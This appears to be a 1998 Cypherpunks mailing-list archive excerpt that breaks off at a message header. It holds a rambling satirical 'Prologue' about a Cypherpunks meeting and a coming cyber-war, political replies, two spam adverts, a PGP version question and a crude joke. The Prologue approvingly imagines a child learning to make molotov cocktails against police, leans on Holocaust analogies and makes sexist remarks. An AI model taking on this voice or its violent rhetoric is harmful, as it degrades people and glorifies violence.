Subject: Prologue 2/0 / Space Aliens Hide My Drugs
Message-ID: <009C217C.9FF29980.11@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain



SPACE ALIENS HIDE MY DRUGS !!!???!!! / Prologue 2/0

If This Is Sunday, I must be Toto:
[Was: Oh, what a Lucky man he Was:]
  It was only the third CypherPunks physical meeting I had attended 
and, as usual I spent the whole time watching from a distance, this 
time with Bianca watching me from a distance, to see who was watching 
me from a distance.
  The cellular rang.

  "Toto?"
  "Yes..."
  "You must be TruthMonger, today, because CJ just told Lucky Green 
that *he* is Toto."
  "OK. I guess it must be because he's so used to being Toto on the 
weekends, when he has to be back in the Home on Monday morning."
  "Bye."
  "Bye, dear." I hung up the phone.

  CJ doesn't get out a lot (pun intended).
  Normally, Bianca and I would have objected to him attending a 
CypherPunks physical meeting, but, since most of us have gone to 
ground recently, we thought there would be little danger in finding 
out what reaction his presence would elicit in certain individuals 
known to have so little sense as to be willing to be publically 
associated with Radical Anarchists who are too old and wise to merely 
be pretentious poseurs, and who actually have the knowledge, skills 
and experience to pose a serious threat to NWO plans to bring the 
Brave New Digital World into a state of CyberStatism.
  Thus, after clothing him in a manner that would make it obvious to 
anyone nervous about his appearance and demeanor that he was not 
likely to be carrying any concealed weapons of mass destruction, we 
ascertained that he had already 'gone potty' and sent him off to the 
C2Net offices in Oakland to act as our WeatherMan and ascertain which 
direction John Gilmore, et al, were blowing.

  Those who know CJ Parker only as a person who, after years of 
working in some of the most technologically advanced areas of the 
computer industry, still refers to a hard drive as "...the 
whatchamacallit...you know, the thing that spins around inside and 
you keep all of your information on it..." often fail to understand 
his usefulness to us a fount of information in regard to the subtle 
nuances that most people fail to pick up on in the busy madness of 
daily activity and social interaction.
  Although superficially inept and ill-equipped for life as we know 
it, those capable of seeing beyond the Veil of Maya recognize that, 
although he may be incapable of brain-registering whether or not the 
woman he has loved and lived with for a quarter of a century wears 
glasses, he has the ability to read the soul and psyche of those whom 
he only meets in passing, on the highways, byways, sidestreets and 
alleys of life.

  I originally thought that he was a totally useless conduit for 
information which needed to be gleaned in a reconnaisance mission 
type of manner. 
  It was one of Bianca's pre-teen computer neophytes who explained to 
me, "It's no use asking him any questions. If you ask him to estimate 
the numbers of at a meeting that thirty people attended, you will get 
an answer ranging between five and a hundred. If you want to find out 
things that even God doesn't know, you just have to make a statement 
that points to something which is likely to be totally untrue. He's 
the TruthMonger, you know."
  For some strange reason, children seem to have little trouble 
instinctively understanding the things that CJ discusses, even if 
they seem to be random, insane blatherings dealing with things far 
beyond the knowledge and experience one would expect a child to have 
had contact with thus far in life.

  "I bet everyone at the CypherPunks meeting was wearing blue socks." 
I told CJ after we met back in Berkeley at his sister's house.
  "No," he replied, "there was a lady wearing interesting jeans, who 
used to be the lover, or something, of one of the men there, and 
seemed to be temporarily in need of a lot of intellectual/emotional 
reassurance about her value and competency because of spending so 
many years of being a female with a brain in a penis-dominated 
industry."
  I now know CJ well enough that I realized that I had only to make 
one more false assumption, even though it was perfectly logical, in 
order to elicit a mountain of information about what took place, even 
though it was unlikely that he remembered, even vaguely, what the 
meeting had been about, from a normal point of view.
  "She spent a lot of time discussing various things with him?" I 
asked.
  "No." CJ replied, looking at me like I had just fallen off the 
turnip truck and had no idea how life really worked. "She barely paid 
any attention to him, and only spoke a few words to him at the end of 
the meeting."
  Moving right along, as if this statement clarified the foundation 
upon which he was basing this information, he proceeded to give us a 
full account of the meeting. An account which we knew would be 
totally accurate, once we had sifted out the parts which existed only 
in his own mind, since they would have made the experience so much 
more interesting and full of 'joi de vivre' if they *had* actually 
happened. (e.g. "...and every time Greg Broiles left the room, they 
would stop whatever they were discussing, and tell lawyer jokes until 
he got back. They've obviously been doing that for years, and he's 
never suspected.")

Random Excerpts From the ClueServer With One 512K Memory Bank:
  "I got to tell Peter Trei that his stuff kicks butt!"

  "Lucky Green and Bill Stewart are wearing the opposite bodies in 
real life that they have in my mind from knowing them on the 
CypherPunks mailing list."

  "The broads were phenomenal. I always figured that it would not be 
a mistake to marry any of the women on the CypherPunks list, sight 
unseen, and I knew I was right just by looking at them.
  "Oh...and when they talked, it wasn't like it burst the bubble of 
some sort of fantasy, or something...they were still like that."  
 {This is the statement that had Bianca snortling and giggling so 
hard that she was drooling on herself and blowing foam out of her 
nostrils. Later, she commented, "That was an example of the types of 
things he would say when I first met him that convinced me what a 
boorish, chauvanistic asshole he was, until I would think about them 
later and realize how sensitive and romantic they were if you really 
thought about what he was saying.")

  "Sameer sure looked at me funny. I guess he might have thought I'd 
just knocked off Billy Gates, and that he was next on the list.
  "I kind of wondered why, until I realized that we never really say 
anything nice about him to balance out all the bad shit we lay on him 
in our Dark Forces conspiracy theories, so that the people who fuck 
with us are less likely to fuck with him.
  "Shit, he's the guy who is taking all of the stuff that the 
idealists and theorists in cryptoanarchy are talking about and 
spreading it out in the real world where money and product rule the 
roost of results.
  "Oh, Yeah! That reminds me...
  "The only time I talked was when Eric Hughes was talking about 
Linux and saying the same bullshit that we all listened to--and said 
ourselves--decades ago, about UNIX. You know, about how UNIX should 
be ruling the world, instead of DOS, only now it's Linux, instead of 
Windows. Except it wasn't bullshit, then or now, except that what 
Hughes was saying was as true as what we used to say, and there isn't 
time anymore to go through this shit more times until we get it 
right, so I knew I had to ask what would make it turn out different 
this time.
  "I couldn't resist stepping on a few corns to see who was cool and 
who wasn't so I phrased my question to throw a little praise in 
Micro$not's direction. I mentioned that UNIX failed to take the hill 
even back when DOS sucked, big-time, and asked how it would be 
possible to do so with Linux, now that BadBillyG had a product that 
was actually functional, and worked, for the most part.
  "I was kind of disappointed in the answers, although I realized 
later that the only comments that came out were the knee-jerk 
reactions of those who had spent years in the industry being tortured 
by having to work with, or live in the shadow of, a primitive M$ 
operating system designed to torture people who actually wanted to 
make computers do something useful.
  "Some of them were very quiet and went inside their heads when I 
asked my question. Probably because its the kind of question you have 
to ask and answer for yourself, usually when you're laying awake in 
bed at four in the morning.
  "Actually, though, Eric Hughes, before I asked it, or afterwards, I 
don't really know, gave what is probably the only real answer, 
although some of us said it way back when, probably even him, but 
maybe we all just need to understand why it is the real answer. He 
said that it was up to people such as those gathered in that room, 
that day, to write the programs and make the links to existing 
software, systems and protocols that would provide end-users with the 
tools that they needed for Linux to legitimately serve their needs.
  "He might have also said that we/they would need to be prepared to 
do it regardless of whether or not it had any immediate or long-term 
financial payoff/incentive for us/them, but even if he didn't, I 
heard that in what he said, and I'm sure most of the others did, 
too."
  "Anyway, saying something nice about Micro$not in that room was as 
much fun as seeing the reaction at a wedding when you crap on the 
wedding cake."

  "I think I comported myself very well, even though it meant 
breaking my promise to my nephew to ask all of the CypherChicks 
whether or not they were wearing panties."

And In Case You Were Thinking About Filing the Preceding In The 
'Humor' Directory:
   Anyone at that CypherPunks physical meeting who failed to think 
seriously about the question CJ posed, either at the time, or later, 
upon reflection, is either an idiot, or quite possibly just too young 
to have been through more than a single "War to end all wars."

  Bianca told me that Lucky Green had mentioned to CJ that he had 
read "The Xenix Chainsaw Massacre" and had made a comment to the 
effect that he didn't really understand what it was, or was supposed 
to be, about. She said that she suspected that the reason for this 
was along the lines of the current status of such works as "1984," 
"Animal Farm" and "Brave New World."
  "1984," for example, is no longer some futuristic tale of a dark 
and menacing fate which may someday befall all of society and 
mankind. Rather, it contains a plethora of evil scenarios which have 
not only come to pass, but which have been realized more completely 
and in a more technologically effecient manner that the author could 
possibly have conceived of.
  Having grown up in an era when many of these futuristic projections 
were already a fait accompli, or in the beginning stages of becoming 
so, I sometime would reflect on how the work would have affected 
those who had read it decades before, when it was originally written. 
What parts seemed as if they might be whisperingly prophetic? What 
parts seemed to be semi-real fantasies about what might occur if the 
whole world went to hell in a handbasket? What parts seemed to be 
totally ludicrous scenarios which were the product of an author with 
too much time on his hands, and an overactive imagination?
  Now I wonder how the Chainsaw Massacre is perceived by those whose 
experience of 'the way things are, and always have been' encompasses 
many of the things which TXCSM had portrayed as dark undercurrents 
swirling about in the vortex of a rapidly spinning new technology.

  Undoubtedly the answer to that question is as multi-faceted and as 
context-dependent as a question asking "Who are you?"
  When the son of gomez describes computers that know all, see all, 
and can spit out the names of the miscreants at the speed of light, 
in order to dispose of them before the battle for the souls of all 
mankind begins, it must assuredly be read and understood differently 
by one whose elders told them tales about the great battles they 
fought to win the 'equal rights' and 'anti-discrimination' battles of 
recent eras, than by one whose elders described to them the dark 
terror of living in fear of being discovered for not wearing the 
yellow star which signified that the identification papers they were 
required to present to those in authority should be checked against 
the list of those to be bundled in cattle-cars which reeked of 
oppression and death, separated from their loved ones and sent to 
far-away labor camps.

  The morning after CJ had spoken to Lucky, Bianca woke in the wee 
hours to find him lying in bed and thinking, not having slept all 
night. She quiety asked him what it was he was thinking about. I 
heard his reply from the next room.
  The words he spoke, in a soft and quietly accepting tone, sent 
shivers down my spine, and left me with much to contemplate as I lay 
awake for some time before drifting off back to sleep.

  "Lucky is a nice kid. He's got bounce in his step and a gleam in 
his eye. He's got the world by the tail and every reason to believe 
that doing what he loves and living life with high standards and 
moral certitude will lead to a future where light will rule over 
darkness, and children will have a reason to smile.
  "I hope he's right. I desperately hope that he's right."
  "I want him to live in a world where "WebWorld & The Mythical 
Circle of Eunuchs" isn't prophetic. Where it is just an interesting 
story about how life could have been if the whole world turned to 
shit.
  "I don't want him to live in a world where, in the end, he ends up 
saying, as in the Prologue to 'WebWorld'--'If only we had known...'"

  "What Eric Hughes said at the CypherPunks meeting made me feel like 
it was 'Deja vu, all over again.' as Yogi Berra used to say.
  "He could well have been Bubba Rom Dos, speaking at the original 
meeting of the Circle of Eunuchs, telling those gathered, 'It's up to 
you. *You* need to pick up the torch. *You* need to write the 
code--to do the groundwork and light the way for those who will come 
after you. *You* need to do it, not for fame, fortune, or profit, but 
simply because it is right, and because it needs doing.'"

  "Linux isn't going to win out because it's the best. And it's not 
even going to be the best unless those who know its value and its 
capabilities *make* it the best for those who will never know or 
understand it, but will only know whether or not it serves them and 
suits their needs.
  "And it's not just Linux. The same goes for all of the other tools 
and trappings of future technolgy--censorware, encryption, monitoring 
tools, anonymity, identity based data-gathering."
  "The masses will use what they are given, what works best for them. 
They will take the easiest road, for the most part, as we all do in 
matters which we cannot control for ourselves. The masses aren't 
crying out for filtering software which will allow their children 
only to access a limited and prejudicial view of the world they live 
in--they are using it because that is what is being made available."

  "The same idealistic computer cowboys and self-proclaimed elitest 
programming gurus who decry the fact that the 'sheeple' are not 
willing to become computer experts in order to make use of what is 
'freely available' would be outraged if an airline company denied 
them a ticket because they didn't have a pilot's license, or didn't 
know from memory where all of the emergency exit doors are on a 
DC-7."

  "I shouldn't have been nice to Lucky. When he told me that he 
didn't understand 'The Xenix Chainsaw Massacre,' I should have 
grabbed him by the throat, thrown him against the wall, slapped him 
silly, and said, 'Read it again, you dumb bastard! It's about you. 
It's about John Gilmore, Tim May, Sandy Sandfort, Lynne Harrison, 
Hallam-Baker, and everyone else who is still wondering why the fuck 
we're spamming their mailing list with all of this semi-literate, 
mystical garbage about a mythical rag-tag band of lunatics striving 
to fight some nebulous battle between the Forces of Light and the 
Forces of Darkness.'
  "I should have told him, 'It's about the CypherPunks, you 
lame-witted dip-shit! "The True Story of the InterNet" was begun long 
before the CypherPunks even existed, because in order for the future 
of mankind to have any hope of all of surviving the next wave of 
technology with any of true life, liberty and freedom intact, 
individuals and groups like the CypherPunks *had* to come into 
existence.'

   "TXCSM was an allegory for the hackers, crackers, phreaks and 
punks who would have to serve as the soldiers, troops and armies that 
would be willing to leave behind the comfort and security of their 
home and hearth, if need be, to defend CyberSpace from those who 
would use it to rule and conquer all of MeatSpace. It's about the 
lawyers and programmers and middle-managers who abhor the hackers, 
crackers, phreaks and punks, but who are working within the system to 
defend the same ideals and concepts, in their own way.
  "The heros from the beginning of time, to the dark days of 
the Third Reich, were'nt soldiers. They were men, women, and 
sometimes even children, who *became* soldiers of one ilk or another, 
in order to defend themselves, their families and neighbors, their 
fellow humans, from rulers and forces which were striving to bring 
all of humanity under their thumb.
  "The Nazi death camps weren't liberated by soldiers. They were 
liberated by the same kind of people who were imprisoned in them. 
Farmers from Moscow, carpenters from Omaha, accountants from France, 
or Sweden, or Austrailia. People with dark skin or light skin, people 
speaking a multitude of different languages, people who had been 
preparing for war from the moment the dark clouds began forming over 
Europe and people who thrust themselves forward into battles they 
were ill-prepared for, when they realized the terror that lay ahead 
if they failed to resist the dark forces which were prepared to do 
them great harm."

  "The war in CyberSpace may lie in the future, when the majority of 
the masses realize that CyberHitler wants *more* than just 
CyberPoland. When the masses realize that the CyberGestapo aren't 
coming only for the CyberJews.
  "...but the revolution is *now*."

  "God help us all if those present at the CypherPunks meeting don't 
understand the true importance of Eric Hughes, a decade after 'The 
Xenix Chainsaw Massacre' was written, echoing the words of Bubba Rom 
Dos when he said, 'It's up to *you* and *I*.'"
  "God help us all if those involved with Alt2600 believe that they 
are just playing an interesting game of 'good guys versus bad guys,' 
and fail to see that the importance of the guerilla manuals they make 
available on this or that system is not in the affrontery it provides 
to the self-proclaimed, righteous, namby-pamby do-gooders, but to 
make it possible for some child of the future to know how to make a 
molotov cocktail when the Sedona, Arizona, SWAT-Team is preparing to 
assault their home with the heavy artillery proved for them by the 
federal government.
  "God help us all if normal, average, boring mathematicians like 
Peter Trei fail to realize that every line of code they write may 
someday become a chambered round of ammunition that provides the 
final blow which brings down the Great Digital Beast that is destined 
to rule us all if it is able to grow and prosper without resistance."

  "I hope and pray that Lucky Green, and others like him, begin to 
realize that the future is now, and that they *are* the future...that 
we *all* are the future.
  "The revolution is *now*, and *we* are the revolution.
  "If enough people realize that, and write the single lines of code 
with their attitudes, their beliefs, their votes and their actions, 
then maybe 'The True Story of the InterNet' will become just an 
interesting story--a cute fantasy instead of a dark harbinger of the 
future.
  "Maybe the dark clouds gathering over Digital Europe will dissipate 
and the sun will shine through, to make us all laugh at our silly 
fears about bad men and beasts who have dark designs to imprison our 
bodies and minds in physical and digital prisons, and who will 
require us to place a yellow star at the beginning of our email 
address."

  "Am I being silly, again? God, I hope so.  Goodnight, dear..."

[TBC]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 21 Feb 1998 04:01:37 +0800
To: Eric Cordian <emc@wire.insync.net>
Subject: Re: The Political Education of Eric Tune
In-Reply-To: <199802200632.AAA01478@wire.insync.net>
Message-ID: <199802201950.LAA16165@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



EC
>Kuwait provoked Iraq far more than places like Panama and Grenada have
>provoked the United States, when US forces poured in to remove
>existing governments, and install regimes sympathetic to Washington,
>also killing thousands of uninvolved civilians.
> 
>Then again, perhaps you believed the touching "Baby Incubator" story
>performed by the daughter of the Kuwaiti ambassador for an
>appreciative Congress, who were unaware of who she was, or that she
>was lying through her teeth.  Perhaps you were also unaware that
>American public opinion during the Persian Gulf War was under the
>control of a domestic public relations firm hired by the government of
>Kuwait.

wow!! well said.

a great book that nails this: "toxic sludge is good for you"
about the public relations industry and how it's playing the
tune while rome burns.

>America always manages to find some pretense to fight the wars it
>decides to fight.  Sometimes there is a staged attack, and an
>arrangement for allies to "invite" us into the conflict.  Other times,
>some imagined threat, like the chance that an infant formula factory
>"could be used" to produce material that "might be used" for chemical
>or biological warfare. Most of us who have watched the antics of
>America for more than a few decades see through the transparent
>rhetoric employed in such situations to manufacture public consent.

yes, and the cracks are starting to show-- how about that recent
rally in Ohio or whereever it was in which the audience refused
to stick to the "wag the dog" script? hee, hee. maybe there is
hope for us yet eh? one of the questions: "if other governments
of the middle east have weapons of mass destruction, why
are we singling out iraq?"

>America needs a low-level format.  Soon.

ouch!! that would hurt!!

another problem you don't mention is that the population has let
our own government run away. we send masses tax money but fail
to hold our own government responsible. "I am not responsible"
is the motto of immature children. we have an entire nation
of them, many on this list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Tim May)
Date: Sat, 21 Feb 1998 04:43:43 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Making fun of the Postal Service is not allowed
Message-ID: <199802202021.MAA16586@always.got.net>
MIME-Version: 1.0
Content-Type: text/plain



Things are really getting whacked out, if what this guy says is true.

(I was partly joking in my comments, but he claims some serious actions
are happening. So much for free speech, once again.)

--Tim



> From: Douglas Begle <douglas.begle@sun.com>
> Newsgroups: ba.mountain-folk,scruz.general
> Subject: Re: Making fun of the Postal Service is not allowed
> Date: Fri, 20 Feb 1998 10:59:03 -0800
> Organization: Sun Microsystems
> Lines: 30
> Message-ID: <34EDD277.DC25199E@sun.com>
> 
> Tim May wrote:
> 
> > It's not the County one has to worry about, it's the U.S. Postal Service.
> >
> > I assume you all saw the proposal that making fun of the Postal Service be
> > made a crime? Seems the USPS is not amused by a computer game called
> > "Going Postal," and wants this game renamed, else they'll file defamation
> > charges.
> >
> > A bit like the head of the American Bar Association telling us a year or
> > so ago that the ABA was considering legal remedies for the epidemic of
> > lawyer jokes.
> >
> > Only in Amerika.
> >
> > --Tim May
> 
> Ha!  so true.  A friend of mine created  the Disgruntled Postal Worker Zone at
> 
> http://www.well.com/user/ecp/index.html
> 
> The USPS issued a cease-and-desist demand.  Twice.  He hasn't.  Twice. I think
> the USPS is still jawing at his lawyer, but he keeps the site updated.
> 
> I bought some of the "Disgruntled?  Ask me."  buttons a while back.  Gems.
> 
> Doug


From owner-cypherpunks@Algebra.COM Sun Feb 22 08:51 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20617 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 08:51:20 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id TAA28379
	for cypherpunks-outgoing; Sat, 21 Feb 1998 19:40:22 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id TAA28367
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 19:40:11 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id QAA16156; Sat, 21 Feb 1998 16:42:24 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id QAA16148 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 16:42:17 -0800 (PST)
Received: from toad.com (toad.com [140.174.2.1]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id QAA26616 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 16:36:59 -0800 (PST)
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id QAA10414 for cypherpunks-unedited-outgoing; Sat, 21 Feb 1998 16:33:54 -0800 (PST)
Received: from out.inexchange.net ([207.22.162.127]) by toad.com (8.7.5/8.7.3) with ESMTP id QAA10408 for <cypherpunks@toad.com>; Sat, 21 Feb 1998 16:33:50 -0800 (PST)
Received: from out.inexchange.net ([207.22.162.127]) by out.inexchange.net
          (Post.Office MTA v3.1 release PO205e ID# 0-0U10L2S100) with SMTP
          id AGT297 for <cypherpunks@toad.com>;
          Fri, 20 Feb 1998 12:26:08 -0500
To: cypherpunks@toad.com
From: info@inexchange.net (Info Desk)
Subject: Advertisement: Website Hosting
Date: Fri, 20 Feb 1998 12:26:08 -0500
Message-ID: <19980220172300666.AGT297@out.inexchange.net>
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text
Content-Length: 1109


http://www.inexchange.net
info@inexchange.net

InExchange would like to introduce our complete Hosting and Promotional service.

     FOR ONLY $19.95 PER MONTH !

* 20 MB (megabytes) of disk space
* 750 MB  of data transfer per month
* 5 E-mail accounts
* INTERNATIONAL Hosting
* Access to your account anytime via the Web Control Panel
* Full MS Front Page support
* Unlimited FTP updates
* Personal CGI directory for your own scripts (or use ours)
* The best statistics analyzer in the industry
* E-mail forwarding, auto responders and vacation reply
* Domain name registration (www.yourname.com)
* FREE registration of your domain with over 250 search   engines
* Real Audio/Video support

* Inquire about our $16.95 plan

* Other plans also include:
  Shopping cart application and database access/utilities
  Cold Fusion Hosting
  CyberCash, iBill and VersaNet ready
  Instant on-line credit card processing

For additional details, please refer to our website:
http://inexchange.net
info@inexchange.net

Inexchange offers you a full 30 day money back guarantee if not satisfied with our services.









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Adam Hewison" <jadam@ino.com>
Date: Sat, 21 Feb 1998 01:47:49 +0800
To: Fred Cypherpunk <cypherpunks@Algebra.COM>
Subject: Last Chance ...less than 149 copies left! Plus FREE Bonus.
Message-ID: <199802202027.MAA24586@demon.ino.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Fred,

The folks who produce The 1998 ULTIMATE FUTURES TRADING GUIDE,  just 
informed me that they have less than 149 copies available for sale

Check it out at: http://www.marketdepot.com/products/utg/

See what the GUIDE has to say about El Nino ... and what effect it will 
have on the economy and the markets and ultimately your money.

Featured New In The 1998 Guide : 

* Annual Price Projections on Every Major Commodity 
* Seasonal Chart Trends
* El Nino Weather Impact
* 15 Year Historical Chart Reference - New Contracts 
* Hundreds of Essential Fundamental & Technical Charts 
* 233 Commodity Trend Timing Windows
* Key US & International Tables on  Supply, Demand
* Cycle Timing & Anniversary Dates 
* Government Report Dates, Futures & Options Expirations 
* Fundamental & Technical Forecasts    
* And much, much more!

(over 17,500 sold this year alone).

ORDER NOW and RECEIVE A SPECIAL FREE BONUS:
 "The 17 Most Important Candlestick Formations" It's our way of saying 
Thank You for your business.

YOU HAVE NO RISK with our 30-DAY MONEY BACK GUARANTEE.

Even if you return the Guide for a FULL REFUND, (excluding shipping and
handling charges), the "The 17 Most Important Candlestick Formations" is 
yours to keep.

With only one printing of the '98 guide SUPPLIES ARE (seriously, 
seriously) LIMITED.   When the '98 Guide is sold out, that's it. There 
will be no other press runs.

ORDER NOW as we have less than 149 copies

GO TO:  http://www.marketdepot.com/products/utg/

or order NOW  by calling any of the numbers below.

888-MKT-DEPOT 888-658-3376 or 410-867-7490
(9:30 a.m. to 7:30 p.m. Eastern Standard Time, Monday - Friday
Fax 410-867-4203 or order online 24-hours a day.

A perfect companion to the '98 Guide is "The Traders Logbook"

This simple, easy to use Logbook makes certain your orders and positions 
are accurate, and creates a history of your trades to show where you 
go right and wrong. And, what can be very important, it as also 
valuable evidence in a case of dispute with your broker.

Check out the Logbook at:

http://www.marketdepot.com/products/logbook

Thank you for your time, and remember I personally endorse both these  
products and stand behind them with our 30 DAY MONEY BACK GUARANTEE 
Policy. That's right. You must be 100% satisfied with the product or 
will will refund you the entire purchase price. No hassles, no 
questions.

No risk to you.

Thank you for your time,

Adam Hewison
President of INO Global Markets.

P.S. Judging by the enormous response and success we had with our 
initial mailing, I expect we will sell out of the remaining  149 
Guides quickly. To avoid disappointment, I recommend that you order as 
soon as possible. Orders will be processed on a first come first 
served basis.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++
IMPORTANT NOTICE
You received this e-mail because your name and e-mail address were
entered at a website operated by INO Global Markets. We specialize in
futures and options information. Our web sites are located at
http://www.ino.com, http://www.quotewatch.com and  
http://www.globalcharts.com.  Products and services connected with the 
futures and options trading are
marketed on our sites and by e-mail. We have a strict practice to
avoid, where possible, sending out unsolicited e-mails. If you wish to
instruct us to discontinue sending e-mails to you. please reply to
this message.

Make sure you insert the word
 REMOVE
 in the subject line of the return e-mail, otherwise we may not see it.
 
 Thank you.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++

****** Other recommended  INO Global Markets sites ******

http://www.ino.com
	The Web Center for Futures and Options Traders.
http://www.marketcenter.com
	FREE resources for the Trader.
http://www.marketdepot.com
	#1 Superstore for Futures and Options Traders
http://options.quotewatch.com
	FREE stock, futures and Index Options
http://quotewatch.com
	FREE Intraday Charts, Quotes and News
http://www.managedmoney.com
	FREE resource for picking a money manager
http://www.ino.com/rovers
	Everythings FREE!
http://www.globalcharts.com
	The Premier charting service on the Web
http://www.ino.com/power
        Options Traders Heaven!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 21 Feb 1998 03:30:51 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: On War, Legends, and Crypto (fwd)
Message-ID: <199802201934.NAA24685@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 20 Feb 1998 14:06:36 -0500
> From: Anonymous <anon@anon.efga.org>
> Subject: On War, Legends, and Crypto

Are you proposing that Cypherpunks are the Sheriff and his posse or the
outlaws?

> There is an old story about a band of outlaws in the wild west.  The local
> sheriff and his men had decided to make an example of this group of
> troublemakers, and chased them into their hideout in a cave outside of
> town.

> After a few weeks a man came riding by to tell the Sheriff that the outlaws
> had just robbed a train in the next town, and everyone was wondering what
> the law enforcement idiots were doing guarding an empty cave instead of
> chasing the criminals.
> 
> It seems that the cave had another way out.  Whether or not this story is
> true, it illustrates an important point - The battle which is won, is the
> one not fought.

>From the trainrobbers perspective this is certainly true. From the Sheriff's
perspective it shows the futility of his job if his goal is to stop all
crime.

Are the Cypherpunks here to rob trains or to keep trains from being robbed?



    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sat, 21 Feb 1998 03:59:51 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: On War, Legends, and Crypto (fwd)
In-Reply-To: <199802201934.NAA24685@einstein.ssz.com>
Message-ID: <199802202021.PAA05000@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199802201934.NAA24685@einstein.ssz.com>, on 02/20/98 
   at 01:34 PM, Jim Choate <ravage@ssz.com> said:

>Are the Cypherpunks here to rob trains or to keep trains from being
>robbed?

Depends on which pays more at the time. :)

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: PATH=C:\DOS;C:\DOS\RUN;C:\WIN\CRASH\DOS;C:\ME\DEL\WIN

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNO3Qro9Co1n+aLhhAQGiWAP+Oat08v1SdnOWU4eeq2NJklfFXciKknd3
Nepys5vvqoSfDZ17HAmTSE42YBas/SZpqiVdr3n402pRrGRg/6Kc0JRxpgirnlNr
uza9I5X790a75sPbl4CLGhxXcY67MTjAMELzDhFu7zeMcbnGSHM8qSFolOLLsypC
JFaI6aLZFR8=
=r01j
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Sat, 21 Feb 1998 05:55:01 +0800
To: cypherpunks@toad.com
Subject: What is the latest version of PGP 5.5.x Biz?
Message-ID: <4b35b9bfbebb51c9c44a07987e2df5d8@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



Uh!  All thses different versions floating about!  Can anyone tell me what the
latest version of PGP 5.5 Biz is?
5.5.2 ?  5.5.3?  (Win32 platform)

Thanks in advance









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perrin ." <pleontks@hotmail.com>
Date: Sat, 21 Feb 1998 07:16:09 +0800
To: Yankee1428@aol.com
Subject: funny #1
Message-ID: <19980220225404.16861.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain




A guy, a pig, and a dog are the survivors of a terrible shipwreck, and
they find themselves stranded on a desert island.  After being there =
awhile,
they get into a ritual of going to the beach every evening to watch=20
the sun go down.  One particular evening the sky was red with 
beautiful=20
cirrus clouds, the breeze was warm  and gentle - a perfect night for =
romance! =20
Well, that pig started looking better and better and pretty soon the guy 
=

rolled toward thepig and put his arm around it.  The dog was not very=20
happy with this and growled fiercely at the guy, until he removed his =
arm=20
from the pig.  They continued to enjoy the sunsets together, but no more 
=

cuddling.  A few weeks passed by, and lo and behold, there was 
another=20
shipwreck.  The only survivor was a beautiful young woman.  She was in a 
=

pretty bad way when they rescued her and they slowly nursed her back 
to=20
good health.  When she was well enough they introduced her to their=20
evening beach ritual.
It was another beautiful evening, red sky, cirrus clouds, warm gentle
breeze, perfect for romance, the four of them lying there.  The guy
started getting 'those' ideas again, so he leaned over toward the 
girl=20
and said, "Um...would you mind taking the dog for a walk?"




______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perrin ." <pleontks@hotmail.com>
Date: Sat, 21 Feb 1998 07:17:42 +0800
